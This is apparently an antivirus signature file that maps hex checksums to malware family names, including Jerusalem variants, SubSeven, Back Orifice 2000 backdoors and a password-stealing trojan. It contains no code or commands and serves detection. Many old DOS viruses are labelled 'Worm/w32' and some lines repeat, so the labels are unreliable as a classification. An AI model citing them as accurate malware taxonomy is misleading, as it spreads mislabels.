3BD1D61A=Worm/w32.Whale
3BD5F8AC=Worm/w32.Dope_Hat
3BD67063=Worm/w32.Australian.Aih
3BD72D88=Trojan/tr.Cruach
3BD8577B=Worm/w32.Gula
3BDCA5C8=Worm/w32.Vienna
3BDCB2C8=Worm/w32.Europe
3BE34089=Worm/w32.Grog
3BE616DE=Worm/w32.Dreg-Based
3BE75BD5=Worm/w32.PS-Based
3BE931C3=Worm/w32.Vienna.B
3BECE2FE=Worm/w32.Armageddon
3BF4C365=Worm/w32.PS-Based
3BFF17D0=Worm/w32.PS-Based
3C033499=Worm/w32.Ivp-Based
3C040C4A=Worm/w32.Falus
3C0475CC=Worm/w32.Fumble
3C108E9B=Worm/w32.CyberTech
3C170371=Worm/w32.Shadowbyte
3C1743C0=Worm/w32.Intended.Naziskin.B
3C1ACFBF=Worm/w32.Yam
3C1AD016=Worm/w32.Burma.B
3C1BF132=Worm/w32.Cruel.D
3C1E81BD=Worm/w32.Nrlg-Based
3C24625C=Worm/w32.SkyNet
3C270DCD=Worm/w32.Bmbb
3C2764CF=Worm/w32.PS-Based
3C297EE4=Worm/w32.Hallochen.C
3C2D7445=Worm/w32.Offin.365
3C2D7C01=Worm/w32.Barrotes.I
3C2F610C=Worm/w32.MadSatan
3C320603=Worm/w32.Seeg
3C32CCC3=Worm/w32.Isly
3C370542=Worm/w32.G2-Based
3C3A38FD=Worm/w32.PS-Based
3C3BC90E=Worm/w32.Dva
3C3EBACD=Worm/w32.PS-Based
3C4069B2=Worm/w32.PS-Based
3C407D0E=Worm/w32.Qumak
3C41176B=Worm/w32.Susenka
3C4149F5=Worm/w32.Jerusalem
3C42D0E4=Worm/w32.G2-Based
3C4532E6=Worm/w32.Vienna
3C4B6455=Worm/w32.MiniMad-Based
3C509B14=Worm/w32.Constructor
3C519CFD=Worm/w32.Jerusalem.A
3C51C8B2=Worm/w32.Vkit-Based
3C565E82=Worm/w32.Australian.A
3C627F80=Worm/w32.PS-Based
3C697BCA=Worm/w32.PS-Based
3C70D29E=Worm/w32.Sk
3C71B9F7=Worm/w32.Grunt
3C75CAEE=Worm/w32.Hllc.Aids
3C79981F=Worm/w32.Grog.B
3C7AA556=Worm/w32.PS-Based
3C7CF261=Worm/w32.Swapper
3C851912=Worm/w32.PS-Based
3C872691=Worm/w32.Ivp-Based
3C8D3ABD=Worm/w32.CivilWar
3C8DCC14=Worm/w32.PS-Based
3C97BF27=Worm/w32.Dreg-Based
3C9ACD8C=Worm/w32.PS-Based
3C9ADD78=Worm/w32.Murderer
3C9D145C=Worm/w32.Harpy
3C9FA682=Worm/w32.Illusion
3CA45883=Worm/w32.PS-Based
3CA71A5E=Worm/w32.Staf.A
3CAA1528=Worm/w32.G2-Based
3CAA353F=Worm/w32.DieHard2.A
3CAA6251=Worm/w32.Jerusalem.E
3CAC37E0=Worm/w32.Vcl
3CAF14AF=Worm/w32.Cascade
3CB36580=Worm/w32.Albania
3CB441BB=Worm/w32.Jerusalem.B
3CB8F86E=Worm/w32.Coup
3CBD2E34=Worm/w32.Toad
3CBE8355=Worm/w32.Dot
3CBEEB5B=Worm/w32.Vienna
3CC0719E=Worm/w32.CyberTech
3CC9E736=Worm/w32.Avenger
3CCCA8EB=Worm/w32.Ambulance.B
3CD07C17=Worm/w32.Dlsu
3CD21594=Worm/w32.Vienna
3CD27049=Worm/w32.Ivp-Based
3CD4F74A=Worm/w32.Murphy.Bhak
3CD6669D=Worm/w32.V1876
3CD81A06=Worm/w32.PS-Based
3CD866AA=Worm/w32.PS-Based
3CDA5F2B=Worm/w32.PS-Based
3CDD117B=Worm/w32.LightGeneral
3CE22A1B=Worm/w32.Seeg
3CEAB652=Worm/w32.PS-Based
3CED0783=Worm/w32.Andry.B
3CF2C953=Worm/w32.Sirius.Spawn
3CF31C4F=Worm/w32.Vacsina
3CF8439B=Worm/w32.LoadError
3CFC45F1=Worm/w32.Kov.Wanderer
3CFC5549=Worm/w32.Xabaras
3CFE173C=Worm/w32.PS-Based
3D00902B=Worm/w32.Mr_Gu
3D01E81E=Worm/w32.ExeHeader.A
3D06A6B7=Worm/w32.MemLapse
3D070F23=Worm/w32.SillyC.D
3D094A63=Worm/w32.SillyC.A
3D0B50CF=Worm/w32.PS-Based
3D0E3A87=Worm/w32.Hate
3D1364F5=Worm/w32.PS-Based
3D16C1E1=Worm/w32.PS-Based
3D1B7A40=Worm/w32.Bat.Winstart.A
3D1CDDBB=Worm/w32.Zany
3D233354=Worm/w32.PS-Based
3D25AAFB=Worm/w32.Dobki
3D2DCAFC=Worm/w32.Vienna
3D3029DD=Worm/w32.Vcl_Mut
3D31A891=Worm/w32.Dementia
3D32AFDE=Worm/w32.Indonga
3D343185=Worm/w32.Airwalker
3D3F5E62=Worm/w32.Ntit
3D3FAEE6=Worm/w32.SillyC
3D42307A=Worm/w32.Vcl
3D42DE4E=Worm/w32.Fumble.A
3D443228=Worm/w32.Bw-Based
3D48E00B=Worm/w32.Abcd.A
3D4A9C30=Worm/w32.PS-Based
3D4C1655=Worm/w32.XDog
3D50060F=Worm/w32.CarryOn
3D558D3C=Worm/w32.Intended
3D583E63=Worm/w32.PS-Based
3D59390F=Worm/w32.Nrlg-Based
3D5A14BE=Worm/w32.Joke
3D5DA1B0=Worm/w32.Kov
3D61A298=Worm/w32.Intended
3D6286B3=Worm/w32.Tout
3D689451=Worm/w32.Mark13
3D6B37FE=Worm/w32.Voices
3D727A45=Worm/w32.CyberShadow
3D7520B9=Worm/w32.Arcv
3D7646FF=Worm/w32.CivilWar
3D79C071=Worm/w32.Dan.Killer
3D79DFFB=Worm/w32.Friday13
3D7CE115=Worm/w32.Avalanche
3D7D0DC7=Worm/w32.Australian
3D7E1076=Worm/w32.Monster.A
3D7EB2E6=Worm/w32.Grog
3D805FCB=Worm/w32.BetaBoys
3D80A32B=Worm/w32.Won
3D819818=Worm/w32.PS-Based
3D81DBD5=Worm/w32.PS-Based
3D82F557=Trojan/tr.Splat
3D8CE802=Worm/w32.Victor
3D90B6B6=Worm/w32.Mephisto
3D9763ED=Worm/w32.Nrlg-Based
3D9C8506=Worm/w32.Burma.C
3D9E9F23=Worm/w32.Loz
3D9EBEB8=Worm/w32.Ivp-Based
3DA1D2F0=Worm/w32.G2-Based
3DA35506=Worm/w32.DrDemon
3DA5328F=Worm/w32.PS-Based
3DA7015A=Worm/w32.Intended
3DA8B979=Worm/w32.Datacrime.A
3DAE430F=Worm/w32.Doomsday
3DAEC33A=Worm/w32.Mnemonix
3DB04A23=Worm/w32.Roet
3DB1E6FD=Worm/w32.Fumble.A
3DB34A3E=Worm/w32.PS-Based
3DB42F2C=Worm/w32.Etop
3DB6166A=Worm/w32.PS-Based
3DB8A006=Worm/w32.Companion
3DBAF03B=Worm/w32.Alar
3DBF6007=Worm/w32.PS-Based
3DC39ECA=Worm/w32.Devil
3DCE0663=Worm/w32.PS-Based
3DCE2862=Worm/w32.Xav
3DD1510B=Worm/w32.Riot
3DD70921=Worm/w32.Snark
3DD7BB5D=Worm/w32.Sylvia.B
3DDA1E54=Worm/w32.Vcl
3DE11505=Worm/w32.Murphy
3DE5F48F=Worm/w32.Lucky
3DEABA02=Worm/w32.WpcBats
3DED3BDD=Worm/w32.Ds
3DF383E6=Worm/w32.Vcc
3DF4DEDB=Worm/w32.Duwende.B
3DFC4168=Worm/w32.Anni
3DFD6EE3=Worm/w32.Whale
3E02A28F=Worm/w32.Vcl-Based
3E08D681=Worm/w32.Burger
3E0B7FA6=Worm/w32.PS-Based
3E0BB2E4=Worm/w32.PS-Based
3E0E69DC=Worm/w32.Bw-Based
3E11296E=Worm/w32.PS-Based
3E11C6E0=Worm/w32.PS-Based
3E176352=Worm/w32.Patoruzu
3E18D615=Worm/w32.PS-Screen
3E1978A2=Worm/w32.Ahav
3E1C8231=Worm/w32.Pixel.C
3E226941=Worm/w32.G2-Based
3E2399B0=Worm/w32.Ahav
3E2504F0=Worm/w32.PS-Based
3E26BFBD=Trojan/tr.Already
3E27278D=Worm/w32.Oggo
3E2ADB70=Worm/w32.BlackMonday
3E300B6F=Worm/w32.Vlad
3E359BDE=Worm/w32.VirTool
3E3817A8=Worm/w32.PS-Based
3E3B9704=Worm/w32.Vienna
3E409878=Worm/w32.PS-Based
3E42226F=Worm/w32.PS-Based
3E44B388=Worm/w32.Tiny
3E45B37C=Worm/w32.PS-Based
3E45D87E=Worm/w32.PS-Based
3E45E8B3=Worm/w32.Mipt
3E469339=Worm/w32.CyberTech
3E47C4FF=Worm/w32.Panic
3E480A23=Worm/w32.Leda
3E4A7076=Worm/w32.PS-Based
3E4AA039=Worm/w32.Chapa.D
3E4B9672=Worm/w32.Trjp
3E594166=Worm/w32.PS-Based
3E5A8904=Worm/w32.Mlti.A
3E5BED91=Worm/w32.Ivp-Based
3E5D4691=Worm/w32.Telefonica
3E604056=Worm/w32.PS-Based
3E625B34=Worm/w32.PS-Based
3E635133=Worm/w32.Lavi-Based
3E63FB8A=Worm/w32.Yb
3E660578=Worm/w32.Nrlg-Based
3E6D0734=Worm/w32.Svc.A
3E6F8BBA=Worm/w32.Skies-Based
3E73E3BA=Worm/w32.Lemming
3E749A04=Worm/w32.Maus.A
3E792D7E=Worm/w32.Vienna
3E794A64=Worm/w32.Vrn
3E79C738=Worm/w32.AntiPascal.B
3E7B33A7=Worm/w32.Implant
3E7C48C0=Worm/w32.PS-Based
3E7F5426=Worm/w32.Ivp
3E82D25F=Worm/w32.Mercury
3E83FEE0=Worm/w32.PS-Based
3E85F0D4=Worm/w32.Unkempt
3E90E2B3=Worm/w32.Vcc-Based
3E94A7C1=Worm/w32.Ivp-Based
3E9542EA=Worm/w32.Nrlg-Based
3E957DAE=Worm/w32.Louse
3E9C7ABF=Worm/w32.Ivp
3EA514E0=Worm/w32.Invader.G
3EA5F944=Worm/w32.Lyli
3EB09D38=Worm/w32.Svc.A
3EB3A442=Worm/w32.Ivp
3EC34FB9=Worm/w32.PS-Based
3EC7E5FA=Worm/w32.Die
3ECE8A38=Worm/w32.Manuel
3ECFCD55=Worm/w32.Metallica
3ED81E19=Worm/w32.Vcl
3EDB6701=Worm/w32.Gs
3EDED982=Worm/w32.PS-Based
3EE064B3=Worm/w32.Matthew
3EE47832=Worm/w32.Peterburg.A
3EE6FFE9=Worm/w32.PS-Based
3EEC3845=Worm/w32.Baba
3EEF674D=Worm/w32.Quest
3EEF94D1=Worm/w32.V707
3EF0B5E8=Worm/w32.PS-Based
3EF48317=Worm/w32.Bw-Based
3EF76114=Worm/w32.PS-Based
3EF957ED=Worm/w32.PS-Based
3EFC5574=Worm/w32.PS-Based
3EFE956E=Worm/w32.Dreg-Based
3F025C76=Worm/w32.Nrlg-Based
3F05C1AE=Worm/w32.Tumen
3F0B957E=Worm/w32.Jerusalem
3F0E4487=Worm/w32.PS-Based
3F11BD6B=Worm/w32.Andromeda.B
3F12569C=Worm/w32.Vienna.C
3F1CADB8=Worm/w32.Europe
3F1E1061=Worm/w32.Vcl
3F2289EF=Worm/w32.Pj
3F2B1548=Worm/w32.Dreg-Based
3F2C035D=Worm/w32.SillyC.C
3F2FA271=Worm/w32.Amoeba
3F3234AB=Worm/w32.MutaGen
3F352F56=Worm/w32.Vkit-Based
3F36E4F9=Worm/w32.Vgol
3F3BD254=Worm/w32.SomeKit
3F3C7CC8=Worm/w32.Tpe
3F408C0A=Worm/w32.Vlad
3F424657=Worm/w32.Australian
3F44DFDF=Worm/w32.PS-Based
3F4508EA=Worm/w32.Cascade
3F45A883=Worm/w32.Ph33r
3F4C821E=Worm/w32.Europe
3F4DA5B1=Worm/w32.PS-Based
3F53713A=Worm/w32.Vlad
3F549A86=Worm/w32.SillyC.B
3F55937D=Worm/w32.Vcl
3F57C9ED=Worm/w32.PS-Based
3F58B49E=Worm/w32.PS-Based
3F5B552F=Worm/w32.PS-Based
3F1429EF=Worm/w32.Sirius
3F15EF26=Worm/w32.PS-Based
3F17DD35=Worm/w32.Friday13
3F18230F=Worm/w32.Virogen
3F1C676D=Worm/w32.G2-Based
37859044=Worm/w32.4on
37889294=Worm/w32.Mururoa
3789E055=Backdoor.Nether
378C1CE9=Backdoor.ForcedEntry
37903AFF=Backdoor.Gayol
3792AB1D=Worm/w32.Alien
379BEA0F=Worm/w32.Evenbeep.A
37A12A62=Worm/w32.Reset
37B0CD4A=Trojan/tr.Mooze
37B14833=Worm/w32.Semisoft.F
37B563DD=Worm/w32.Henky
37B7D55B=Worm/w32.PS-Based
37BB39C2=Worm/w32.PS-Based
37BC718E=Worm/w32.BadAss
37BCF164=Worm/w32.RedMercury
37BE655F=Worm/w32.PS-Based
37C5C883=Worm/w32.Anthrax
37CC5C01=Worm/w32.Liberty.A
37CCCF9B=Worm/w32.Dir
37D4013E=Worm/w32.AntiExe.C
37D45CCF=Worm/w32.Buffy.D
37D5A020=Worm/w32.LoveMe
37D78D6C=Worm/w32.Kaliostro
37D8B918=Worm/w32.Ant.A
37DC13E5=Worm/w32.Nomad
37EA43FE=Worm/w32.BootCOM.B
37EAA5D8=Worm/w32.Intended
37EB0B08=Worm/w32.Gotcha
37EBE350=Worm/w32.Yosha
37F68311=Worm/w32.Dead
37F75CC0=Worm/w32.Tiny
37F848FF=Worm/w32.Nuker
37FB9731=Trojan/tr.AOL
3801A1E4=Worm/w32.Gippo.D
38022615=Worm/w32.ES
3805B9F5=Worm/w32.Nrlg-Based
3806F8B0=Worm/w32.Diamond.B
38074F55=Worm/w32.Lokjaw
380DF5DB=Worm/w32.Corrupted.A
380FD8E2=Worm/w32.Voronezh
3810B3CE=Worm/w32.AOS
3810C08C=Worm/w32.Mix.B
3810F5AA=Backdoor.Izeburn
38130150=Trojan/tr.RegForm
3816C456=Worm/w32.StalkerX
381A41E9=Worm/w32.Murphy
381A7D4A=Worm/w32.Exploit
381A8FFE=Backdoor.Theef.B
381E60AC=Trojan/tr.EraseHDD.B
3824E6D5=Worm/w32.Kipa
3828B8A8=Worm/w32.Nuker
3829232B=Worm/w32.Vulcan
382ABA2E=Trojan/tr.TheLoader
382C6FAA=Worm/w32.V
382FE7A9=Worm/w32.Kerstin.B
3831F895=Worm/w32.Crypto
38320B5A=Worm/w32.Ivp-Based
38336DAA=Worm/w32.PS-Based
3833AE91=Worm/w32.SofiaTerminator
38370544=Trojan/tr.Crazy
38382ADC=Worm/w32.Arvc.B
383EB631=Worm/w32.VirTool
384754AE=Worm/w32.Murkry
3847FCF3=Worm/w32.BadRelig
38497CCD=Backdoor.InCommander
384C7E3B=Worm/w32.Tigre
3854E29D=Worm/w32.Fruit.A
385512AC=Worm/w32.Kmfdm
385685F4=Worm/w32.Poss
385922DA=Worm/w32.Lokjaw
385EAE2E=Worm/w32.CriCri
385F5BA5=Backdoor.Coma
3860684D=Worm/w32.Ghost
387443C4=Backdoor.MasterParadise.D
387563B6=Worm/w32.Tavc
3879392E=Worm/w32.PS-Based
387A800A=Worm/w32.Momma
387BF04C=Worm/w32.Squatter
3880C5BE=Worm/w32.Oxana
388293E9=Worm/w32.Bw-Based
388A18F3=Trojan/tr.ICKiller
3894E700=Worm/w32.Hider
3895CC6A=Worm/w32.Aep
3898904D=Worm/w32.Gippo.A
3898BEAB=Worm/w32.Vcc-Based
389B1207=Trojan/tr.Eps
389EE0B1=Worm/w32.Diamond
38A09B8F=Worm/w32.CorporateLife
38A8A931=Trojan/tr.AOL
38AA72A5=Worm/w32.PolyEngineSGen.B
38AB6F31=Backdoor.NetDemon
38AC32C7=Worm/w32.PS-Based
38AFE3E7=Worm/w32.SillyWR.B
38AFE55D=Worm/w32.RainSong
38B04D28=Worm/w32.Mini
38B3254C=Worm/w32.TaiPan
38B37AF4=Worm/w32.Messev
38B7CBE6=Worm/w32.FaxFree.E
38BAA9AC=Worm/w32.Kode4
38BB8C49=Trojan/tr.CallerID
38BBD91E=Worm/w32.BackFont
38BC7719=Worm/w32.DmSetup.J
38BE142B=Worm/w32.Vcc
38C458AB=Trojan/tr.Coced
38CA1963=Worm/w32.Magdzie
38CBC8C3=Worm/w32.Ambulance.A
38CCAF58=Worm/w32.Flooder
38D0D835=Worm/w32.Oolong
38D17FA9=Backdoor.BO
38D35BB3=Worm/w32.Gnat
38D5A596=Worm/w32.Riot
38D74E0A=Worm/w32.Rajaat
38D95A42=Worm/w32.Leprosy.A
38DCD995=Worm/w32.Wit.A
38DE2198=Trojan/tr.Crack
38E144C3=Worm/w32.Trivial.D
38ED3444=Worm/w32.Hllo
38EF3329=Worm/w32.Hllo
38F0BA33=Worm/w32.Sisoruen
38F659C3=Worm/w32.suspicion
38FE78E6=Backdoor.Netspy
3443C460=Worm/w32.Butoijo
F1B8AE99=Worm/w32.Luffy.A
362F53E5=Worm/w32.Headline
362FF7E3=Worm/w32.Proto
36319D24=Worm/w32.Nazi
3636910F=Worm/w32.SecretForm
3639BA78=Worm/w32.Andromeda.B
363B7D1C=Backdoor.Psyf
363C2865=Worm/w32.Beer
363D050D=Worm/w32.Bishkek
363E0E98=Worm/w32.Nuker
364B045A=Backdoor.StealthSpy.B
364E40AE=Worm/w32.Piolin
365008DE=Worm/w32.Constructor
36546AC9=Backdoor.Minilash.B
365E8C65=Worm/w32.Murphy
366AC603=Backdoor.SubSeven.D
3677FD58=Worm/w32.Win16.B
36847D28=Worm/w32.Android
368D3FF6=Worm/w32.Murphy
36940284=Backdoor.Izeburn
36972CFD=Worm/w32.Armageddon
36979DD7=Worm/w32.Insert
369C2FBC=Trojan/tr.Dropper
36B46EB0=Trojan/tr.EraseHDD.B
36B48539=Worm/w32.PS-Based
36B575B4=Worm/w32.Julia
36B71173=Worm/w32.Levi
36BBF81E=Worm/w32.Jerusalem.A
36BCE138=Worm/w32.Shirley.A
36BE3E29=Trojan/tr.Mssc
36C61450=Worm/w32.Altar
36D45941=Worm/w32.Nuke
36D86539=Trojan/tr.Titanic
36DB9446=Worm/w32.Suicidal
36DC6B48=Worm/w32.Vkit-Based
36E2DF78=Worm/w32.PS-Based
36F01131=Backdoor.BusConquerer
36F0F342=Worm/w32.Skull
36F3C15C=Worm/w32.TimerJack
36F78EF5=Worm/w32.PS-Based
36F9464D=Worm/w32.Frust
36FC01F5=Worm/w32.Vcl-Based
3706B4BF=Trojan/tr.Dtran
370888BD=Worm/w32.Harlem
3708FBDD=Worm/w32.Flooder
37094816=Worm/w32.Rch
370ED4AA=Worm/w32.VirTool.B
3710454F=Worm/w32.PolyEngine
37109655=Worm/w32.SillyOC
37117148=Backdoor.UltimateRAT
3712703D=Worm/w32.SVC
3712D47D=Worm/w32.Music.C
371EF766=Worm/w32.Fdate1111
37201279=Worm/w32.Cossiga.B
3722692C=Worm/w32.Runme
3723D1A2=Worm/w32.IRC-Worm.B
372EDA04=Backdoor.Phantom
372FC595=Trojan/tr.Multibinder
37306799=Worm/w32.Stereo
37314543=Worm/w32.Fog.D
3733658D=Worm/w32.Mummy
373B2264=Worm/w32.Sidex
373EECCB=Backdoor.SecretService
37413219=Backdoor.BO2K
37459801=Trojan/tr.QFat.B
37486974=Backdoor.Xtcp
374EBE16=Worm/w32.Tokio
3752BFDF=Worm/w32.Hybris.D
3753DA26=Worm/w32.Ivp-Based
37566B53=Backdoor.Millenium.A
37583D29=Worm/w32.PS-Based
375AA351=Worm/w32.G2-Based
375ECCF2=Worm/w32.PS-Based
375F57EE=Worm/w32.Radiation
376656A5=Worm/w32.Julius
3767862A=Worm/w32.Kuarahy
3768C1ED=Backdoor.Duddie
376C40BD=Worm/w32.AOC
376DC50D=Worm/w32.Funeral.B
376E89F7=Worm/w32.Constructor
3774DA8C=Worm/w32.Joke
37810B60=Worm/w32.Unspeed
3782B4B2=Backdoor.Exploiter.E
3782DA64=Backdoor.NetController
37838A3E=Worm/w32.EAF
3F5E9F98=Worm/w32.PS-Based
3F6078EB=Worm/w32.Eddie
3F60805D=Worm/w32.PS-Based
3F66E063=Worm/w32.SatanBrain
3F69187D=Worm/w32.Cascade.X
3F6A4112=Worm/w32.Marian
3F6BCB32=Worm/w32.Nrlg-Based
3F6E8BF8=Worm/w32.Tiny.C
3F7512FA=Worm/w32.PS-Based
3F7DCE7F=Worm/w32.Vcc
3F80FB38=Worm/w32.Rainbow
3F85BFC4=Worm/w32.PS-Based
3F8A6E25=Worm/w32.Tout
3F8C7D64=Worm/w32.Sylvia.A
3F8DC579=Worm/w32.SillyORC.B
3F8EAC8D=Trojan/tr.Claes
3F923C83=Worm/w32.PS-Based
3F945CF8=Worm/w32.PS-Based
3F958C51=Worm/w32.Clone-Based
3F97555A=Worm/w32.MiniMad-Based
3F976942=Worm/w32.Dutch_Tiny
3F97DCF4=Worm/w32.Ash.A
3F98C295=Worm/w32.Timid
3F9BA6DD=Worm/w32.Deviant
3F9F1166=Worm/w32.Dreg-Based
3FA2CCBB=Worm/w32.Vlad
3FA44336=Worm/w32.Csl
3FA8D27C=Worm/w32.Mte-Based
3FAD7A21=Worm/w32.Armageddon
3FB043EC=Worm/w32.Baby.A
3FB4C423=Worm/w32.Suspicion
3FC3CDE9=Worm/w32.Vienna
3FC56DD1=Worm/w32.PS-Based
3FCAC233=Worm/w32.Pcbb
3FCEEC2C=Worm/w32.Bw-Based
3FD457E9=Worm/w32.PS-Based
3FDAFFC0=Worm/w32.Murphy
3FE68D4E=Worm/w32.Jerusalem.A
3FEA1EA3=Worm/w32.Barcelona
3FEDDB33=Worm/w32.Defiler
3FF023B1=Worm/w32.Pixel.C
3FF04198=Worm/w32.Riot
3FF11113=Worm/w32.Murphy
3FF4BE42=Worm/w32.PS-Based
3FF50B8D=Worm/w32.Jak
3FF86B72=Worm/w32.Trivial
3FFD2CA8=Worm/w32.Vcl-Based
3FFDF959=Worm/w32.Kohntark
3002469D=Worm/w32.Wench
30056534=Worm/w32.Cafeini
30065C95=Worm/w32.Spammer
300D938B=Worm/w32.SillyE
300F7E00=Worm/w32.DerSpeher
3011BE32=Worm/w32.SuiGeneris
30192D79=Worm/w32.Tds.Se
3021262B=Worm/w32.Donut
30252D01=Worm/w32.Krile
302E7348=Worm/w32.Pick
30320CB7=Worm/w32.Cabanas.B
303490D1=Worm/w32.Grog
3038C932=Trojan/tr.Aid
3038F7FB=Worm/w32.Demonhyak
30427D30=Worm/w32.KillerFile
30456E93=Trojan/tr.BleemFake.A
3048410C=Trojan/tr.FBI
304AD46E=Worm/w32.Lehigh
304B55C6=Worm/w32.Constructor
3051F2CE=Worm/w32.VsW
30566864=Worm/w32.Slovakia
30589E37=Worm/w32.Cancenbero
305AF2B0=Worm/w32.Leprosy
305CA970=Worm/w32.ExeHeader
305E9A8C=Worm/w32.GhostMail
30617760=Worm/w32.Arianne.A
30664E88=Worm/w32.Trivial
306CA560=Worm/w32.PS-Based
306F2201=Worm/w32.Tds.4f
3070F4BF=Worm/w32.Chaos
30719CB9=Worm/w32.PS-Based
307326E6=Worm/w32.Legs
30742B5A=Trojan/tr.Troman.B
3077FC8B=Trojan/tr.Ystl
307AD5BF=Worm/w32.Nrlg-Based
30816F82=Worm/w32.Lightning
30858843=Worm/w32.IniKill
308DD9C2=Worm/w32.Necropolis.E
308F5BD9=Worm/w32.Nyb.C
308FBDD8=Worm/w32.Hllc
3090E089=Worm/w32.G2-Based
3090F3F6=Worm/w32.Yosha
30910FDF=Worm/w32.ExeHeader.C
30920961=Trojan/tr.Aol.Waol
309A4C97=Worm/w32.PS-Based
309B5BBD=Worm/w32.TurnOff
309F1C25=Worm/w32.SofiaTerminator
30A20A3F=Trojan/tr.Aol.Ps
30A78D3B=Worm/w32.Vir_1_4
30A92579=Worm/w32.Prosiak
30AC2381=Worm/w32.Riot
30B4FC03=Worm/w32.PS-Based
30B6EA5D=Worm/w32.Aardwolf
30B90CD8=Worm/w32.PS-Based
30BB9CEF=Worm/w32.Hllp
30BE1348=Trojan/tr.Katien
30C0A41D=Worm/w32.KbrBug
30C6C56E=Worm/w32.InCommander
30C70307=Trojan/tr.Aol.Massof
30C7226B=Worm/w32.HackTack
30C8C614=Worm/w32.Ahav
30CAD5F5=Worm/w32.Trood
30CB0B5D=Worm/w32.Infis
30D1663B=Worm/w32.Henky
30D87BE2=Worm/w32.PS-Based
30DA64B8=Worm/w32.SillyWR.C
30E0B985=Worm/w32.Gift
30E412B9=Worm/w32.Grosser
30EF2C42=Worm/w32.Bw-Based
30F1BF3F=Worm/w32.WinCrash
30F1DB36=Worm/w32.V707
30F4EDF5=Worm/w32.Andromeda.E
30F84816=Worm/w32.G2-Based
30FC240D=Worm/w32.DirectConnection
3102D599=Worm/w32.Senna.F
3106D960=Worm/w32.Maya
310814E0=Worm/w32.RainSong
310B139A=Worm/w32.Constructor
31191F1F=Trojan/tr.Aol.Genozide
311A6C7E=Trojan/tr.FormatC.A
311C03D7=Worm/w32.Trivial.A
311CB3B4=Worm/w32.Hllc
3137969A=Worm/w32.Tchechen
3137CDB3=Worm/w32.PS-Based
313A59C0=Worm/w32.PS-Based
313C9626=Worm/w32.IRC.Taxif.D
313F0AEE=Worm/w32.Cvme
314046E7=Worm/w32.VirTool
314B4C3C=Worm/w32.Dada
314CE526=Worm/w32.Hepatitus
31523F6A=Worm/w32.Vkit-Based
31562263=Worm/w32.Duwende.A
315659F4=Worm/w32.Cathinone
31576C7F=Worm/w32.Ivp-Based
315CA3B9=Worm/w32.V3scan.A
315FC46B=Worm/w32.Mix.B
316086D6=Worm/w32.Hllc.Sv
316C4093=Worm/w32.PS-Based
3170FBE1=Worm/w32.Corrupted
31799786=Worm/w32.Bw-Based
317C02A0=Worm/w32.DirectConnection
317C7113=Worm/w32.Uvc
31803A8A=Worm/w32.Darkmil
3182F4BB=Worm/w32.MF
31847FA8=Worm/w32.Trivial
31862C32=Worm/w32.SubSeven.B
318A4E05=Worm/w32.Murphy
318D6FF5=Worm/w32.Tiny.D
318FD1F0=Worm/w32.Carbuncle
319369EC=Worm/w32.Psychward.C
3193BE3A=Worm/w32.Sailor
31A885C8=Worm/w32.CyberTech
31A9EFA5=Trojan/tr.Coced
31ACBB10=Worm/w32.Generic
31B15C45=Worm/w32.Lizard
31B33B5B=Worm/w32.April_1st
31B361E2=Worm/w32.MF
31B8A3A1=Worm/w32.PS-Based
31BB231C=Worm/w32.PS-Based
31BC359B=Worm/w32.Bla
31BC7EFB=Worm/w32.KbrBug
31C03B41=Trojan/tr.Dina
31C1AF43=Worm/w32.Killer
31CA4C74=Worm/w32.Bionet
31CCAD28=Worm/w32.Trivial
31CDCD64=Worm/w32.CorporateLife
31D850F7=Worm/w32.Oprobe
31DF5F1D=Worm/w32.Ren
31DFB6B1=Worm/w32.PS-Based
31E03237=Worm/w32.Bionet
31E510CD=Worm/w32.Nrlg-Based
31E8FBF7=Trojan/tr.PwSteal.B
31EA3E62=Worm/w32.Stealth
31EC1D6A=Worm/w32.Intruder
31EC57ED=Worm/w32.Henky
31ECFA23=Worm/w32.RemoteShut
31ED4FC2=Worm/w32.Dutch_Tiny
31F2F896=Trojan/tr.TheLoader
31F34151=Worm/w32.MacGyver.A
32038E3E=Trojan/tr.Apem
3229B1D7=Worm/w32.Slovakia
322ADF47=Worm/w32.Nrlg-Based
32368434=Worm/w32.Generic
323B5C4E=Worm/w32.Wonder.A
323C91AE=Trojan/tr.LammerBuster
324F8BEC=Worm/w32.Hllo
325194F3=Worm/w32.Fever
3251B51C=Worm/w32.PS-Based
3255AA71=Worm/w32.BO2K.B
3255B3C4=Worm/w32.PS-Based
3258DB4E=Worm/w32.Henky
325F45C5=Worm/w32.Syslock
32610C80=Worm/w32.Marzia
326B40B2=Worm/w32.PS-Based
326C61D8=Worm/w32.Constructor
3276BD5B=Worm/w32.Intended
3276DF07=Worm/w32.PS-Based
32778654=Worm/w32.Revenger
32783E2A=Worm/w32.Intruder
327F5E3C=Worm/w32.Alicia.A
32806D81=Worm/w32.Vampiro.C
328215D4=Worm/w32.Srm
3282BBB9=Worm/w32.Backage
328376BC=Worm/w32.Intended.B
328AF424=Worm/w32.Generic
328E429B=Worm/w32.Eaf
3293ED20=Worm/w32.Phoenix
3295A9F8=Worm/w32.Beavis
32977AE4=Worm/w32.Skinner
329A20C4=Worm/w32.WCRat
32A45DE1=Trojan/tr.Aol.Double
32A8DB96=Worm/w32.MiniBlackLash
32B07C74=Worm/w32.SillyE
32B3C022=Worm/w32.TheFlu
32B75D7B=Worm/w32.Constructor
32B9156D=Worm/w32.Pinhead
32B94450=Worm/w32.Cntv
32B98241=Worm/w32.Riot
32B9EA50=Worm/w32.Trivial-Based
32BEEBDF=Worm/w32.PS-Based
32BEFBB4=Worm/w32.Julus.A
32C82D08=Worm/w32.Ping.J
32CE8183=Trojan/tr.Psw.Horse.E
32DAD38D=Worm/w32.Ash
32DBF3FF=Worm/w32.Light
32DDDA08=Worm/w32.Teacher
32E349E8=Worm/w32.Kov
32E49EB1=Worm/w32.Heyya
32E8DDBE=Worm/w32.Vkit-Based
32EA4399=Worm/w32.Piaf
32ED0F0F=Worm/w32.SillyC
32EE5B10=Worm/w32.Sahand
32F50358=Worm/w32.GateCrasher
32F89EE2=Worm/w32.CmjSpy
32F963F7=Worm/w32.Pepper
330397EB=Worm/w32.Helloween
330B4230=Worm/w32.V3scan
33113AAE=Worm/w32.Armageddon
3319FC79=Worm/w32.PS-Based
331EA5CD=Worm/w32.SubSeven
332099F6=Worm/w32.TaiPan
3320A43D=Worm/w32.Diamond
3325238E=Worm/w32.Joker.A
332AC130=Worm/w32.PS-Based
332EF1CE=Worm/w32.Awme
79C72DB3=Worm/w32.Renova.A
2885C8C6=Worm/w32.Renova.B
2885C8C6=Worm/w32.Renova.B
3330B5B2=Backdoor.RTB
3331FA6F=Backdoor.Optix.A
3337027B=Worm/w32.Hip
33396E0B=Worm/w32.Search
333AFE2F=Trojan/tr.Jackel
